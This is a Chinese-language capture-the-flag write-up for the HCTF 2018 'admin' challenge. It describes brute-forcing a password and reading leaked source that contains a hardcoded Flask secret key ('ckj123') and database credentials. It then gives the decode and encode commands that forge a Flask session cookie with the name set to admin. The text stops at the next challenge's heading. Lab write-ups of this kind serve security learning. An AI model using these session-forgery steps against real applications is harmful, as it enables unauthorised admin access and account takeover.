BUUCTF-Web方向21-25wp

[HCTF 2018]admin

打开情况，有三处提示，一个跳转链接，一个登录注册，一个提示不是admin

点击hctf，无法访问

注册个账号，依旧无法查看，看来需要admin账号

弱口令

爆破暗码

当暗码未123长度明显差别

登录

session伪造

在修改暗码界面，提示session

下载该源码查看，index.php

1. {% include('header.html') %}
2. {% if current_user.is_authenticated %}
3. <h1 >Hello {{ session['name'] }}</h1>
4. {% endif %}
5. {% if current_user.is_authenticated and session['name'] == 'admin' %}       //session的name=admin才行
6. <h1 >hctf{xxxxxxxxx}</h1>
7. {% endif %}
9. <h1 >Welcome to hctf</h1>
11. {% include('footer.html') %}

复制代码

session值

1. .eJw9UE2PgjAQ_SubOXuQghcTD26KRpJpgykh04txEYFC3QQ1QI3_faubeJi8w_uYN_OAw7kvrzUsb_29nMGhOcHyAV8_sASy2iCvFqgokHk8IaOB8t1c8nYSLB00_65lvumkykZy-xpNHAmXhTpPvDN2wsYM7d6QWjPhUoeqCsh6ncVRvjTce_mmIdOGMscFuXgSvJgLtgu812PKSPkOeRaJ7aYjV4V6mwV6S6Pku0mbtfPZkZ8VPGdQXPvz4fbblpfPCWiKQShiyNKQTDUK489wSatNNiBvI-SFr-5XqaR5IZmTwWr1jmvssSo_SWVXx1n6z1yO1hNw649FCzO4X8v-_TcI5vD8A-s4bN0.Z7qRbQ.v-Ap7KW-T8GzuEtnu2WDl_-2plg

复制代码

在config.py中

1. import os
2. class Config(object):
3.     SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'     //secret_key=ckj123
4.     SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
5.     SQLALCHEMY_TRACK_MODIFICATIONS = True

复制代码

工具下载

1. git clone https://github.com/noraj/flask-session-cookie-manager

复制代码

解密：

1. python3 flask_session_cookie_manager3.py decode -c .eJw9UE2PgjAQ_SubOXuQghcTD26KRpJpgykh04txEYFC3QQ1QI3_faubeJi8w_uYN_OAw7kvrzUsb_29nMGhOcHyAV8_sASy2iCvFqgokHk8IaOB8t1c8nYSLB00_65lvumkykZy-xpNHAmXhTpPvDN2wsYM7d6QWjPhUoeqCsh6ncVRvjTce_mmIdOGMscFuXgSvJgLtgu812PKSPkOeRaJ7aYjV4V6mwV6S6Pku0mbtfPZkZ8VPGdQXPvz4fbblpfPCWiKQShiyNKQTDUK489wSatNNiBvI-SFr-5XqaR5IZmTwWr1jmvssSo_SWVXx1n6z1yO1hNw649FCzO4X8v-_TcI5vD8A-s4bN0.Z7qRbQ.v-Ap7KW-T8GzuEtnu2WDl_-2plg -s ckj123

复制代码

解密结果，这里我们需要将name改成admin

1. {'_fresh': True, '_id': b'bfc0891659a23f0ab48927d0d0a9ae951c4a218757ebff136a62dca06743185bda2c19bfd1e81bb979c9c124747b56a47d6a6c1e84aec87de5df1822f03a08a0', 'csrf_token': b'2705663d7b8161232df50098071c1452bc14b7c2', 'image': b'zXDQ', 'name': 'track', 'user_id': '10'}

复制代码

举行session伪造

1. python3 flask_session_cookie_manager3.py encode -t "{'_fresh': True, '_id': b'bfc0891659a23f0ab48927d0d0a9ae951c4a218757ebff136a62dca06743185bda2c19bfd1e81bb979c9c124747b56a47d6a6c1e84aec87de5df1822f03a08a0', 'csrf_token': b'2705663d7b8161232df50098071c1452bc14b7c2', 'image': b'zXDQ', 'name': 'admin', 'user_id': '10'}" -s ckj123

复制代码

伪造的session

1. .eJw9UE2PgjAQ_SubOXuQghcTD26KBpJpgykh04txEYFi3QQ1QI3_faubeJi8w_uYN_OA_amvrg0sb_29msG-PcLyAV8_sASy2iCvF6gokEU8IaOBimQueTcJlg2afzey2JylykdyuwZNHAmXh7pIvTN2wsYM7c6QWjPhMoeqDsh6ncVRvjTce_mmJdOFssAFuXgSvJwLlgTe6zFjpHyHIo_EdnMmV4d6mwd6S6PkyaTN2vnsyM8KnjMor_1pf_vtqsvnBDTlIBQxZFlIph6F8We4tNMmH5B3EfLSV_erVNq-kMzRYL16x7X2UFefpOrcxHn2z1wO1hNwONr2AjO4X6v-_TcI5vD8A-oIbNE.Z7qUFw.wgQI2lOZR0DLoEc8neo5vNoDBaU

复制代码

在初始页面包中修改session，拿到flag

[MRCTF2020]你传你
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。